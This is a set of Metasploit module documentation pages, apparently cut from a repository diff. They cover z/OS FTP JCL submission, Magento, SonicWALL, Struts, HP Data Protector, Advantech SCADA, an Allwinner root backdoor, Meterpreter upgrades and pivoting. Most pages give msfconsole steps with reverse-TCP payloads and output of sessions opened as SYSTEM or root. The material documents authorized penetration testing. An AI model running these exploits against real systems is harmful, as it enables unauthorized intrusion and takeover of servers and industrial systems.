If the exploit works, any JCL the user has rights to submit can be submitted.
|
||||
|
||||
See cmd type payloads under mainframe with jcl in the payload name, e.g.:
|
||||
|
||||
```
|
||||
msf exploit(ftp_jcl_creds) > show payloads
|
||||
|
||||
Compatible Payloads
|
||||
===================
|
||||
|
||||
Name Disclosure Date Rank Description
|
||||
---- --------------- ---- -----------
|
||||
cmd/mainframe/generic_jcl normal Generic JCL Test for Mainframe Exploits
|
||||
cmd/mainframe/reverse_shell_jcl normal Z/OS (MVS) Command Shell, Reverse TCP
|
||||
```
|
||||
|
||||
## Verification Steps
|
||||
|
||||
A successful check of the exploit will look like this:
|
||||
|
||||
```
|
||||
msf exploit(ftp_jcl_creds) > set FTPUSER ftptest
|
||||
FTPUSER => ftptest
|
||||
msf exploit(ftp_jcl_creds) > set FTPPASS password
|
||||
FTPPASS => password
|
||||
msf exploit(ftp_jcl_creds) > set RHOST 10.10.10.1
|
||||
RHOST => 10.10.10.1
|
||||
msf exploit(ftp_jcl_creds) > info
|
||||
|
||||
Name: FTP JCL Execution
|
||||
Module: exploit/mainframe/ftp/ftp_jcl_creds
|
||||
Platform: Mainframe
|
||||
Privileged: No
|
||||
License: Metasploit Framework License (BSD)
|
||||
Rank: Normal
|
||||
Disclosed: 2013-05-12
|
||||
|
||||
Available targets:
|
||||
Id Name
|
||||
-- ----
|
||||
0 auto
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FTPPASS password no The password for the specified username
|
||||
FTPUSER ftptest no The username to authenticate as
|
||||
RHOST 10.10.10.1 yes The target address
|
||||
RPORT 21 yes The target port
|
||||
SLEEP 5 no Time to wait before checking if job has completed.
|
||||
|
||||
Payload information:
|
||||
|
||||
Description:
|
||||
Submit JCL to z/OS via FTP and SITE FILE=JES. This exploit requires
|
||||
valid credentials on the target system
|
||||
|
||||
msf exploit(ftp_jcl_creds) > check
|
||||
|
||||
[+] 10.10.10.1:21 - Successfully connected to FTP server.
|
||||
[*] 10.10.10.1:21 - Found IBM z/OS Banner and JES commands accepted
|
||||
[+] The target is vulnerable.
|
||||
msf exploit(ftp_jcl_creds) >
|
||||
```
|
||||
|
||||
|
||||
## Debugging
|
||||
|
||||
If the exploit or check is not working, turn on the VERBOSE and FTPDEBUG settings of the exploit and run.
|
||||
The output should look similar to the below, on a vulnerable system.
|
||||
|
||||
```
|
||||
msf exploit(ftp_jcl_creds) > set FTPDEBUG true
|
||||
FTPDEBUG => true
|
||||
msf exploit(ftp_jcl_creds) > set VERBOSE true
|
||||
VERBOSE => true
|
||||
msf exploit(ftp_jcl_creds) > check
|
||||
|
||||
[*] 10.10.10.1:21 - Connecting to FTP server 10.10.10.1:21...
|
||||
[*] 10.10.10.1:21 - FTP recv: "220-FTPD1 IBM FTP CS V2R1 at ZOS.EXAMPLE.COM, 16:52:31 on 2016-04-27.\r\n220 Connection will close if idle for more than 5 minutes.\r\n"
|
||||
[*] 10.10.10.1:21 - Connected to target FTP server.
|
||||
[*] 10.10.10.1:21 - Authenticating as ftptest with password password...
|
||||
[*] 10.10.10.1:21 - FTP send: "USER ftptest\r\n"
|
||||
[*] 10.10.10.1:21 - FTP recv: "331 Send password please.\r\n"
|
||||
[*] 10.10.10.1:21 - Sending password...
|
||||
[*] 10.10.10.1:21 - FTP send: "PASS password\r\n"
|
||||
[*] 10.10.10.1:21 - FTP recv: "230 FTPTEST is logged on. Working directory is \"FTPTEST.\".\r\n"
|
||||
[+] 10.10.10.1:21 - Successfully connected to FTP server.
|
||||
[*] 10.10.10.1:21 - FTP send: "site file=jes\r\n"
|
||||
[*] 10.10.10.1:21 - FTP recv: "200 SITE command was accepted\r\n"
|
||||
[*] 10.10.10.1:21 - Found IBM z/OS Banner and JES commands accepted
|
||||
[+] The target is vulnerable.
|
||||
msf exploit(ftp_jcl_creds) >
|
||||
```
|
||||
|
||||
## Notes
|
||||
|
||||
The job run will leave a joblog for the credentials used.
|
|
@ -0,0 +1,90 @@
|
|||
Magento is a popular open-source e-commerce platform written in PHP. An unserialization
|
||||
vulnerability exists in the product that allows an unauthenticated user to gain arbitrary
|
||||
code execution.
|
||||
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
Magento Community and Enterprise editions before 2.0.6 are affected. The magento_unserialize module
|
||||
was specifically tested against version 2.0.6, on Ubuntu 14.04 and Debian.
|
||||
|
||||
For testing purposes, you can download the vulnerable applications [here](https://www.exploit-db.com/apps/d34a83e80f927d7336cc8ef37a9867f4-magento2-2.0.5.tar.gz).
|
||||
|
||||
## Verification Steps
|
||||
|
||||
To set up a vulnerable version of Magento, please follow these steps. This is specific to
|
||||
Ubuntu 14, and assumes you are installing Magento under /var/www/html/.
|
||||
|
||||
1. Set up a [Ubuntu](http://www.ubuntu.com/) box.
|
||||
2. Open a terminal, and enter: ```sudo apt-get install apache2```
|
||||
3. Enter: ```sudo apt-get install php5```
|
||||
4. Enter: ```sudo a2enmod rewrite```
|
||||
5. Add the following content to /etc/apache2/sites-enabled/000-default.conf, inside the virtual block:
|
||||
|
||||
```
|
||||
<Directory /var/www/html>
|
||||
Options Indexes FollowSymLinks MultiViews
|
||||
AllowOverride All
|
||||
Order allow,deny
|
||||
allow from all
|
||||
</Directory>
|
||||
```
|
||||
|
||||
6. Download the [vulnerable Magento app](https://www.exploit-db.com/apps/d34a83e80f927d7336cc8ef37a9867f4-magento2-2.0.5.tar.gz)
|
||||
7. Extract the compressed file: ```tar -xf magento2-2.0.5.tar.gz```
|
||||
8. Move the files and directories of magento2-2.0.5 to /var/www/html/ (make sure .htaccess is copied too)
|
||||
9. In terminal, enter: ```sudo chmod 644 /var/www/html/.htaccess```
|
||||
10. Enter: ```sudo service apache2 restart```
|
||||
11. Enter: ```sudo apt-get install mysql-server-5.6```. And follow the installation instructions of MySQL.
|
||||
12. Enter: ```sudo apt-get install php5-mysql```
|
||||
13. Enter: ```sudo apt-get install php5-mcrypt```
|
||||
14. Enter: ```sudo php5enmod mcrypt```
|
||||
15. Enter: ```sudo apt-get install php5-xsl php5-curl php5-intl```
|
||||
16. Enter: ```sudo service apache2 restart```
|
||||
17. cd to /var/www/html, enter: ```sudo mkdir tmp```, and cd to tmp
|
||||
18. In tmp, do: ```curl -sS https://getcomposer.org/install | php```
|
||||
19. Enter: ```sudo mv composer /usr/local/bin/composer```
|
||||
20. In /var/www/html, do: ```composer install```
|
||||
21. You will be asked for a username (public key) and password (private key). You can register
|
||||
for one here: https://marketplace.magento.com/
|
||||
22. Back to terminal, enter: ```mysql -h localhost -u root -p[password]```
|
||||
23. In mysql, enter: ```create database magento```, and exit
|
||||
24. Go to http://localhost with a browser, and install Magento through the web interface.
|
||||
25. After installation, back to the terminal, and enter: ```sudo rm -rf var/cache/*```
|
||||
26. Enter: ```sudo rm -rf var/generation/*```
|
||||
27. Enter: ```sudo rm -rf var/page_cache/*```
|
||||
28. cd to /var/www/html/bin
|
||||
29. Enter: ```sudo php magento deploy:mode:set developer```. It should say that you're in developer mode.
|
||||
30. Enter: ```sudo php magento setup:static-content:deploy```
|
||||
31. Enter: ```sudo php magento indexer:reindex```
|
||||
32. Enter: ```sudo chmod -R 777 /var/www/html```
|
||||
33. Go to http://localhost, you should see Magento up and running.
|
||||
34. From Magento, log in as admin, and create a product. After creating one, make sure this product
|
||||
is also searchable from the front-end.
|
||||
|
||||
After setting up Magento, you can use your exploit module:
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: ```exploit/multi/http/magento_unserialize```
|
||||
3. Do: ```set RHOST [IP]```
|
||||
4. Do: ```set PAYLOAD php/meterpreter/reverse_tcp```
|
||||
5. Do: ```set LHOST [IP]```
|
||||
6. Do: ```exploit```
|
||||
7. And you should get a session
|
||||
|
||||
## Demonstration
|
||||
|
||||
```
|
||||
msf exploit(magento_unserialize) > check
|
||||
[*] 192.168.1.108:80 The target appears to be vulnerable.
|
||||
msf exploit(magento_unserialize) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.1.94:4444
|
||||
[+] 192.168.1.108:80 - generated a guest cart id
|
||||
[+] 192.168.1.108:80 - backdoor done!
|
||||
[*] Sending stage (33721 bytes) to 192.168.1.108
|
||||
[*] Meterpreter session 6 opened (192.168.1.94:4444 -> 192.168.1.108:46835) at 2016-06-02 17:09:34 -0500
|
||||
[+] 192.168.1.108:80 - Deleted lP5UgbUBLm1sWN25gWfZBqYKms.php
|
||||
|
||||
meterpreter >
|
||||
```
|
|
@ -0,0 +1,67 @@
|
|||
Dell SonicWALL Scrutinizer is multi-vendor, application traffic analytics, visualization and
|
||||
reporting tool to measure and troubleshoot real-time network performance. It is used by routers,
|
||||
firewalls, and other network equipment products.
|
||||
|
||||
In version 11.0.1, SonicWall Scrutinizer suffers from a vulnerability that allows a remote
|
||||
attacker to inject a malicious SQL string into the methodDetail parameter, and then gain
|
||||
control of execution under the context of SYSTEM on Windows, or Apache on Linux.
|
||||
|
||||
Authentication is required to exploit this vulnerability. However, SonicWALL Scrutinizer does
|
||||
come with a default username and password (admin:admin), which is also somewhat unsafe.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
As reported by the vendor, only version 11.0.1 is vulnerable to the SQL injection attack.
|
||||
|
||||
For testing purposes, you may download the vulnerable version of Dell SonicWALL Scrutinizer for Windows from:
|
||||
[http://software.sonicwall.com/ScrutinizerSW/184-003184-00_Rev_A_sonicwall-oem-Scrutinizer-windows-installer.exe](http://software.sonicwall.com/ScrutinizerSW/184-003184-00_Rev_A_sonicwall-oem-Scrutinizer-windows-installer.exe).
|
||||
|
||||
If you prefer the appliance, then you can get it from: [http://software.sonicwall.com/scrutinizerVA/184-003186-00_Rev_A_Dell_SonicWALL_ScrutinizerVA.zip](http://software.sonicwall.com/scrutinizerVA/184-003186-00_Rev_A_Dell_SonicWALL_ScrutinizerVA.zip).
|
||||
|
||||
## Verification Steps
|
||||
|
||||
For testing purposes, the Windows installer is a bit easier to use. You should be able to complete
|
||||
it by simply following the instructions on the screen.
|
||||
|
||||
The Linux appliance requires more steps. To be able to use this, make sure you have more than 20GB
|
||||
on disk. And you may need to modify the boot menu to [reset the root password](https://wiki.centos.org/TipsAndTricks/ResetRootPassword) if you cannot get around the scrutinizer login screen.
|
||||
|
||||
Using the sonicwall_scrutinizer_methoddetail_sqli module is rather straight-forward. Make sure
|
||||
you have a valid username and password, and configure the payload for the target. You will most
|
||||
likely use the module like this:
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: ```use exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli ```
|
||||
3. Do: ```set RHOST [TARGET IP]```
|
||||
5. Do: ```set PAYLOAD [PAYLOAD NAME]``` (use ```show payloads``` for more info)
|
||||
6. Do: ```exploit```
|
||||
|
||||
## Scenarios
|
||||
|
||||
sonicwall_scrutinizer_methoddetail_sqli supports two platforms: Windows and Linux. By default,
|
||||
it can automatically find the right OS, and configure the exploit and payload generation
|
||||
accordingly.
|
||||
|
||||
**Using the module against Windows platform**
|
||||
|
||||
If sonicwall_scrutinizer_methoddetail_sqli is able to exploit SonicWALL Scrutinizer successfully,
|
||||
on Windows you will be compromising the host as SYSTEM - the highest privilege. However, since
|
||||
Windows does not allow you to delete the malicious executable that is in use, you will have to
|
||||
do this manually at some point after you've migrated to a different process. The exploit should
|
||||
tell you where this binary is like this message:
|
||||
|
||||
```
|
||||
[!] This exploit may require manual cleanup of 'YrfCO.exe' on the target
|
||||
```
|
||||
|
||||
**Using the module against Linux platform**
|
||||
|
||||
For Linux platform, sonicwall_scrutinizer_methoddetail_sqli was specifically written against
|
||||
the Linux appliance provided by Dell, but it should also work against other similar machines.
|
||||
|
||||
Unlike Windows, if the module is able to successfully exploit the machine, you won't have the
|
||||
highest privilege, instead you start off with Apache.
|
||||
|
||||
Automatic cleanup is not an issue on Linux. Both the PHP backdoor and the Linux binary
|
||||
should be automatically removed without problems.
|
||||
|
|
@ -0,0 +1,56 @@
|
|||
struts_dmi_exec is a module that exploits Apache Struts 2's Dynamic Method Invocation,
|
||||
and it supports Windows and Linux platforms.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
Apache Struts versions between 2.3.20 and 2.3.28 are vulnerable, except 2.3.20.2 and 2.3.24.2.
|
||||
The application's struts.xml also needs set ```struts.enable.DynamicMethodInvocation``` to true,
|
||||
and ```struts.devMode``` to false.
|
||||
|
||||
For testing purposes, here is how you would set up the vulnerable machine:
|
||||
|
||||
1. Download Apache Tomcat
|
||||
2. Download Java. [Choose an appropriate version](http://tomcat.apache.org/whichversion.html) based on the Apache Tomcat version you downloaded.
|
||||
3. Download the vulnerable [Apache Struts application](https://github.com/rapid7/metasploit-framework/files/241784/struts2-blank.tar.gz).
|
||||
4. Install Java first. Make sure you have the JAVA_HOME environment variable.
|
||||
5. Extract Apache Tomcat.
|
||||
6. In conf directory of Apache Tomcat, open the tomcat-users.xml file with a text editor.
|
||||
7. In tomcat-users.xml, add this role: ```<role rolename="manager-gui"/>```
|
||||
8. In tomcat-users.xml, add this role to user tomcat: ```<user username="tomcat" password="tomcat" roles="tomcat,manager-gui"/>```
|
||||
9. Remove other users.
|
||||
10. In a terminal or command prompt, ```cd``` to the bin directory, and run: ```catalina.bat run``` (or catalina.sh). You should have Apache Tomcat running on port 8080.
|
||||
11. Extract the vulnerable struts app: ```tar -xf struts2-blank.tar.gz```
|
||||
12. Navigate to the Apache Tomcat server with a browser on port 8080.
|
||||
13. Click on Manager App
|
||||
14. In the WAR file to deploy section, deploy struts2-blank.war
|
||||
15. Stop struts2-blank in the manager app.
|
||||
16. On the server, ```cd``` to ```apache-tomcat-[version]/webapps/struts2-blank/WEB-INF/classes```, open struts.xml with a text editor.
|
||||
17. In the XML file, update ```struts.enable.DynamicMethodInvocation``` to true
|
||||
18. In the XML file, update ```struts.devMode``` to false.
|
||||
19. Back to Apache Tomcat's manager app. Start the struts2-blank again.
|
||||
|
||||
And now you have a vulnerable server.
|
||||
|
||||
|
||||
## Options
|
||||
|
||||
**TMPPATH**
|
||||
|
||||
By default, the struts_dmi_exec exploit should be ready to go without much configuration. However,
|
||||
in case you need to change where the payload should be uploaded to, make sure to set the correct
|
||||
target, and then change the TMPPATH datastore option.
|
||||
|
||||
## Scenarios
|
||||
|
||||
struts_dmi_exec supports three platforms: Windows, Linux, and Java. By default, it uses Java, so
|
||||
you don't need to worry about configuring this. Running the module can be as simple as the usage
|
||||
explained in the Overview section.
|
||||
|
||||
However, native payload do have their benefits (for example: Windows Meterpreter has better
|
||||
support than Java), so if you decide to switch to a different platform, here is what you do:
|
||||
|
||||
1. Do ```show targets```, and see which one you should be using
|
||||
2. Do ```set target [id]```
|
||||
3. Do ```show payloads```, which shows you a list of compatible payloads for that target.
|
||||
4. Do: ```set payload [payload name]```
|
||||
5. Do: ```exploit```
|
|
@ -0,0 +1,75 @@
|
|||
HP Data Protector is an automated backup and recovery software for single-server to enterprise
|
||||
environments. It provides cross-platform, online backup of data for Microsoft Windows, Unix,
|
||||
and Linux operating systems.
|
||||
|
||||
While the server is using Encrypted Control Communication, HP Data Protector allows a remote
|
||||
attacker to gain access without authentication, and gain arbitrary code execution under the
|
||||
context of SYSTEM.
|
||||
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
HP Data Protector versions 7, 8, and 9 are known to be affected.
|
||||
|
||||
hp_dataprotector_encrypted_comms was specifically tested against version 9.0.0 on Windows 2008.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
**Installing HP Data Protector**
|
||||
|
||||
Before installing HP Data Protector, a Windows domain controller is needed. This exploit was tested
|
||||
against [a Windows Server 2008 R2 SP1 domain controller](https://www.youtube.com/watch?v=Buj9oEgbRt8).
|
||||
|
||||
After setting up the domain controller, double-click on the HP Data Protector installer, and you
|
||||
should see this screen:
|
||||
|
||||
![screen_1](https://cloud.githubusercontent.com/assets/13082457/15794665/99a86238-29e4-11e6-8ccd-0e09b0c8a693.png)
|
||||
|
||||
Click on **Install Data Protector**. And then the installer should ask you which installation type:
|
||||
|
||||
![screen_2](https://cloud.githubusercontent.com/assets/13082457/15794701/de31d07e-29e4-11e6-9410-0b88abe77afe.png)
|
||||
|
||||
Make sure to select **Cell Manager**, and click **Next**. Use all default settings.
|
||||
|
||||
**Enabling Encrypted Communication**
|
||||
|
||||
After the Setup Wizard is finished, we need to enable encrypted communication. First, open the
|
||||
Data Protector GUI:
|
||||
|
||||
![screen_3](https://cloud.githubusercontent.com/assets/1170914/15845344/d3a84ee4-2c37-11e6-821d-fe8002c94686.png)
|
||||
|
||||
Click on **Clients**, and the local client from the tree. You should see the **Connection** tab on the
|
||||
right, click on that.
|
||||
|
||||
![screen_4](https://cloud.githubusercontent.com/assets/1170914/15845351/df9929f8-2c37-11e6-9d82-8c519c030a5f.png)
|
||||
|
||||
Under the Connection tab, there should be an **Encrypted control communication** checkbox, make
|
||||
sure that is checked. And then click **Apply**
|
||||
|
||||
**Using hp_dataprotector_encrypted_comms**
|
||||
|
||||
After the encrypted communication is enabled, you are ready to use
|
||||
hp_dataprotector_encrypted_comms. Here is what you do:
|
||||
|
||||
1. Start msfconsole
|
||||
2. Do: ```use exploit/windows/misc/hp_dataprotector_encrypted_comms```
|
||||
3. Do: ```set RHOST [IP ADDRESS]```
|
||||
4. Do: ```set PAYLOAD [PAYLOAD NAME]```
|
||||
5. Set other options as needed
|
||||
6. Do: ```exploit```, and you should receive a session like the following:
|
||||
|
||||
```
|
||||
msf exploit(hp_dataprotector_encrypted_comms) > run
|
||||
|
||||
[*] Started reverse TCP handler on 172.16.23.1:4444
|
||||
[*] 172.16.23.173:5555 - Initiating connection
|
||||
[*] 172.16.23.173:5555 - Establishing encrypted channel
|
||||
[*] 172.16.23.173:5555 - Sending payload
|
||||
[*] 172.16.23.173:5555 - Waiting for payload execution (this can take up to 30 seconds or so)
|
||||
[*] Sending stage (957999 bytes) to 172.16.23.173
|
||||
[*] Meterpreter session 1 opened (172.16.23.1:4444 -> 172.16.23.173:49304) at 2016-06-06 22:16:54 -0500
|
||||
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\SYSTEM
|
||||
```
|
||||
|
|
@ -0,0 +1,36 @@
|
|||
Advantech WebAccess is a web-based software package for human-machine interfaces and supervisory
|
||||
control and data acquisition (SCADA). WebAccess 8.0 suffers from a vulnerability that allows an
|
||||
attacker to upload a malicious file onto the web server, and gain arbitrary code execution under
|
||||
the context of IIS APPPOOL\WADashboard_pool.
|
||||
|
||||
## Vulnerable Application
|
||||
|
||||
All builds of Advantech WebAccess 8.0 are affected:
|
||||
|
||||
* [WebAccess 8.0 _20150816](http://advcloudfiles.advantech.com/web/Download/webaccess/8.0/AdvantechWebAccessUSANode8.0_20150816.exe)
|
||||
* [WebAccess 8.0 _20141103](http://advcloudfiles.advantech.com/web/Download/webaccess/8.0/AdvantechWebAccessUSANode8.0_20141103_3.4.3.exe)
|
||||
|
||||
For exploitation, there is a difference between the two versions. The 2014 version of WebAccess 8.0
|
||||
had two upload actions in the UploadAjaxAction class: uploadBannerImage, and uploadImageCommon. The
|
||||
2015 version of WebAccess 8.0 added another upload action: uploadFile. This exploit uses the
|
||||
uploadImageCommon action because it works for both.
|
||||
|
||||
Advantech WebAccess 8.1 mitigated the vulnerability by enforcing authentication for
|
||||
UploadAjaxAction. However, keep in mind that WebAccess 8.1 comes with a default credential of
|
||||
user name "admin" with a blank password, which means the user is likely still at risk by using the
|
||||
default configuration.
|
||||
|
||||
advantech_webaccess_dashboard_file_upload will not attempt to exploit WebAccess 8.1.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. Start a Windows machine (such as Windows 7 SP1).
|
||||
2. To install Advantech WebAccess, make sure to install the Internet Information Services Windows
|
||||
feature.
|
||||
3. Download WebAccess 8.0, and install it. After installation, make sure the web application is
|
||||
operational by accessing with a browser (on port 80).
|
||||
4. Start msfconsole
|
||||
5. Do: ```use exploit/windows/scada/advantech_webaccess_dashboard_file_upload```
|
||||
6. Do: ```set RHOST [TARGET_IP]```
|
||||
7. Set other options if needed
|
||||
8. Do: ```exploit```, and you should get a session.
|
|
@ -0,0 +1,93 @@
|
|||
Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
|
||||
Vulnerable OS: all OS images available for Orange Pis,
|
||||
any for FriendlyARM's NanoPi M1,
|
||||
SinoVoip's M2+ and M3,
|
||||
Cuebietech's Cubietruck +
|
||||
Linksprite's pcDuino8 Uno
|
||||
Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
|
||||
|
||||
This module attempts to exploit a debug backdoor privilege escalation in Allwinner SoC based devices. Implements the Allwinner privilege escalation as documented in [Metasploit issue #6869](https://github.com/rapid7/metasploit-framework/issues/6869). It is a simple debug kernel module that, when "rootmydevice" is echoed to the process, it escalates the shell to root.
|
||||
|
||||
## Usage
|
||||
|
||||
To use this module, you need a vulnerable device. An Orange Pi (PC model) running Lubuntu 14.04 v0.8.0 works, but other OSes for the device (as well as other devices) are also vulnerable.
|
||||
|
||||
- `use auxiliary/scanner/ssh/ssh_login`
|
||||
|
||||
```
|
||||
msf auxiliary(ssh_login) > set username orangepi
|
||||
username => orangepi
|
||||
msf auxiliary(ssh_login) > set password orangepi
|
||||
password => orangepi
|
||||
msf auxiliary(ssh_login) > set rhosts 192.168.2.21
|
||||
rhosts => 192.168.2.21
|
||||
msf auxiliary(ssh_login) > exploit
|
||||
|
||||
[*] 192.168.2.21:22 SSH - Starting bruteforce
|
||||
[+] 192.168.2.21:22 SSH - Success: 'orangepi:orangepi' 'uid=1001(orangepi) gid=1001(orangepi) groups=1001(orangepi),27(sudo),29(audio) Linux orangepi 3.4.39 #41 SMP PREEMPT Sun Jun 21 13:09:26 HKT 2015 armv7l armv7l armv7l GNU/Linux '
|
||||
[!] No active DB -- Credential data will not be saved!
|
||||
[*] Command shell session 1 opened (192.168.2.229:33673 -> 192.168.2.21:22) at 2016-05-17 21:55:27 -0400
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
|
||||
- `use post/multi/escalate/allwinner_backdoor`
|
||||
|
||||
```
|
||||
msf post(allwinner_backdoor) > set verbose true
|
||||
verbose => true
|
||||
msf post(allwinner_backdoor) > set session 1
|
||||
session => 1
|
||||
msf post(allwinner_backdoor) > run
|
||||
```
|
||||
|
||||
## Successful exploitation:
|
||||
|
||||
```
|
||||
[+] Backdoor found, exploiting.
|
||||
[+] Privilege Escalation Successful
|
||||
[*] Post module execution completed
|
||||
msf post(allwinner_backdoor) > sessions -i 1
|
||||
[*] Starting interaction with 1...
|
||||
|
||||
2013564244
|
||||
uHvwyYtCTXENEYdrCoKdgVxTpKlbnqsW
|
||||
true
|
||||
RUVRnPJFFgVpuqEiYXdtXpwdDZxVwZPS
|
||||
TitlDmvnSvINczARsMAKdajpRoXEohXO
|
||||
0
|
||||
RtBPRSiAsiGoFatKQVukpjIjGBpJdXqq
|
||||
id
|
||||
uid=0(root) gid=0(root) groups=0(root),27(sudo),29(audio),1001(orangepi)
|
||||
^Z
|
||||
Background session 1? [y/N] y
|
||||
```
|
||||
|
||||
## Graceful exit on non-vulnerable devices:
|
||||
|
||||
```
|
||||
msf > use auxiliary/scanner/ssh/ssh_login
|
||||
msf auxiliary(ssh_login) > set username pi
|
||||
username => pi
|
||||
msf auxiliary(ssh_login) > set password raspberry
|
||||
password => raspberry
|
||||
msf auxiliary(ssh_login) > set rhosts basementpi
|
||||
rhosts => basementpi
|
||||
msf auxiliary(ssh_login) > exploit
|
||||
|
||||
[*] 192.168.2.80:22 SSH - Starting bruteforce
|
||||
[+] 192.168.2.80:22 SSH - Success: 'pi:raspberry' 'uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),106(netdev),996(gpio),997(i2c),998(spi),999(input) Linux basementpi 4.1.19-v7+ #858 SMP Tue Mar 15 15:56:00 GMT 2016 armv7l GNU/Linux '
|
||||
[!] No active DB -- Credential data will not be saved!
|
||||
[*] Command shell session 1 opened (192.168.2.229:36438 -> 192.168.2.80:22) at 2016-05-17 22:19:57 -0400
|
||||
[*] Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf auxiliary(ssh_login) > use post/multi/escalate/allwinner_backdoor
|
||||
msf post(allwinner_backdoor) > set verbose true
|
||||
verbose => true
|
||||
msf post(allwinner_backdoor) > set session 1
|
||||
session => 1
|
||||
msf post(allwinner_backdoor) > run
|
||||
|
||||
[-] Backdoor /proc/sunxi_debug/sunxi_debug not found.
|
||||
[*] Post module execution completed
|
||||
```
|
|
@ -0,0 +1,128 @@
|
|||
shell_to_meterpreter allows you to upgrade a shell session to Meterpreter. It can be launched as
|
||||
a post module, or from the sessions command. By default, this module will use a reverse
|
||||
Meterpreter.
|
||||
|
||||
## Important Options
|
||||
|
||||
**HANDLER**
|
||||
|
||||
The handler option is for starting a multi/handler to receive the connection. By default this is
|
||||
true, because you will need it. But if for some reason if you're setting one separately, you may
|
||||
want to consider having it as false.
|
||||
|
||||
**LHOST**
|
||||
|
||||
The LHOST option is for the reverse Meterpreter you are upgrading to. By default, the module can
|
||||
figure it out for you. But over a pivot, you will need to manually set this, because session
|
||||
objects don't necessarily have that information.
|
||||
|
||||
**LPORT**
|
||||
|
||||
The LPORT option is also for the reverse Meterpreter you are upgrading to.
|
||||
|
||||
**PAYLOAD_OVERRIDE**
|
||||
|
||||
This is an advanced option. If you don't want to use the default reverse Meterpreter, then you can
|
||||
use this.
|
||||
|
||||
## Scenarios
|
||||
|
||||
**Using sessions -u**
|
||||
|
||||
```sessions -u``` is the same as running the post module against a specific session. However, this
|
||||
is limited to using the default reverse Meterpreter payload, so you will not be able to use it
|
||||
via a pivot.
|
||||
|
||||
Usage is rather simple. At the msf prompt, first off, read the sessions table to see which one you
|
||||
want to upgrade:
|
||||
|
||||
```
|
||||
msf > sessions
|
||||
|
||||
Active sessions
|
||||
===============
|
||||
|
||||
Id Type Information Connection
|
||||
-- ---- ----------- ----------
|
||||
1 shell windows 192.168.146.1:4444 -> 192.168.146.128:1204 (192.168.146.128)
|
||||
|
||||
msf >
|
||||
```
|
||||
|
||||
In this demonstration, session 1 is a shell, so we upgrade that:
|
||||
|
||||
```
|
||||
msf > sessions -u 1
|
||||
```
|
||||
|
||||
**Upgrading a shell via a pivot**
|
||||
|
||||
This scenario is a little tricky, because the default options won't work over a pivot. The problem
|
||||
is that if you got a session with a bindshell, your LHOST will say "Local Pipe". And if you got it
|
||||
with a reverse shell, the LHOST is actually an IP range. Neither is an acceptable format for the
|
||||
LHOST option.
|
||||
|
||||
There are two ways you can choose: either you must manually set LHOST, or you could choose a
|
||||
bind Meterpreter. The second is really easy, all you need to do is ```set PAYLOAD_OVERRIDE```.
|
||||
|
||||
If you prefer to manually set LHOST, this should be the compromised host you're pivoting from.
|
||||
Perhaps a digram will help to explain this:
|
||||
|
||||
```
|
||||
|-------------| |-------------------| |-------------------|
|
||||
| Attacker | <---> | Compromised box A | <---> | Compromised box B |
|
||||
|-------------| |-------------------| |-------------------|
|
||||
192.168.146.1 192.168.146.128
|
||||
192.168.1.101 (VPN) 192.168.1.102(VPN)
|
||||
```
|
||||
|
||||
In this example, let's start with breaking into box A (192.168.146.128):
|
||||
|
||||
```
|
||||
[*] Sending stage (957999 bytes) to 192.168.146.128
|
||||
[*] Meterpreter session 1 opened (192.168.146.1:4444 -> 192.168.146.128:1208) at 2016-04-28 22:45:09 -0500
|
||||
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
We decide that box A is on a VPN, with IP 192.168.1.101. Also, we found box B as 192.168.1.102. We
|
||||
need to create that pivot:
|
||||
|
||||
```
|
||||
msf > route add 192.168.1.1 255.255.255.0 1
|
||||
[*] Route added
|
||||
```
|
||||
|
||||
And we break into box B (192.168.1.102) with a Windows bind shell:
|
||||
|
||||
```
|
||||
[*] Command shell session 2 opened (Local Pipe -> Remote Pipe) at 2016-04-28 22:47:03 -0500
|
||||
```
|
||||
|
||||
Notice this says "Local Pipe", which means the box B's session object doesn't really know box A's IP.
|
||||
If you try to run shell_to_meterpreter this way, this is all you get:
|
||||
|
||||
```
|
||||
msf post(shell_to_meterpreter) > run
|
||||
|
||||
[*] Upgrading session ID: 2
|
||||
[-] LHOST is "Local Pipe", please manually set the correct IP.
|
||||
[*] Post module execution completed
|
||||
```
|
||||
|
||||
To upgrade box B's shell, set LHOST to box A's 192.168.1.101. And that should connect correctly:
|
||||
|
||||
```
|
||||
msf post(shell_to_meterpreter) > run
|
||||
|
||||
[*] Upgrading session ID: 2
|
||||
[*] Starting exploit/multi/handler
|
||||
[*] Started reverse TCP handler on 192.168.1.101:4433 via the meterpreter on session 1
|
||||
[*] Starting the payload handler...
|
||||
[*] Sending stage (957999 bytes) to 192.168.1.102
|
||||
[-] Powershell is not installed on the target.
|
||||
[*] Command stager progress: 1.66% (1699/102108 bytes)
|
||||
...
|
||||
[*] Command stager progress: 100.00% (102108/102108 bytes)
|
||||
[*] Meterpreter session 3 opened (192.168.146.1-192.168.146.128:4433 -> 192.168.1.102:1056) at 2016-04-28 22:50:56 -0500
|
||||
```
|
|
@ -0,0 +1,226 @@
|
|||
This is a Meterpreter post exploitation module that will generate TCP and UDP packets on a range of ports and send them to a provided IP address. The primary purpose of this is for 'egress busting' and provides a rapid method of generating legitimate TCP or UDP traffic on each port. This is useful for red-teaming type exercises in which you have meterpreter running on a host but wish to determine additional ports over which egress traffic is permitted.
|
||||
|
||||
It can generate the packets in two different ways; it can call the Windows sockets API (using railgun for Windows clients) or it can create the packets using Rex.
|
||||
|
||||
